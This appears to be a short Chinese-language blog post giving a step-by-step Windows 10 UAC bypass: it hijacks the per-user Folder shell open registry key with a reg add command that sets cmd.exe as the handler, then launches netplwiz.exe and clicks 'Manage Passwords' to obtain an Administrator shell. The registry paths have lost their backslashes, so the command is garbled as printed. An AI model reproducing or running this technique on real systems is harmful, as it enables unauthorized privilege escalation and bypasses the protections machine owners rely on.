类型:GUI Hack
方法:注册表项操作
目标:system32netplwiz.exe
组件:攻击者定义
Works from: window 10
HKCUSoftwareClassesFoldershellopencommand
单击netplwiz.exe中的“管理密码”按钮时调用

请输入图片描述

产生步骤:
运行命令

reg add "HKCUSoftwareClassesFoldershellopencommand" /d "cmd.exe /c cmd.exe" /f && reg add HKCUSoftwareClassesFoldershellopencommand /v "DelegateExecute" /f
在cmd中运行netplwiz.exe。
选择“ 高级 ”选项卡,然后单击“ 管理密码 ”按钮。
然后您将获得Administrator Shell。请输入图片描述


本文由 扶苏 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

还不快抢沙发

添加新评论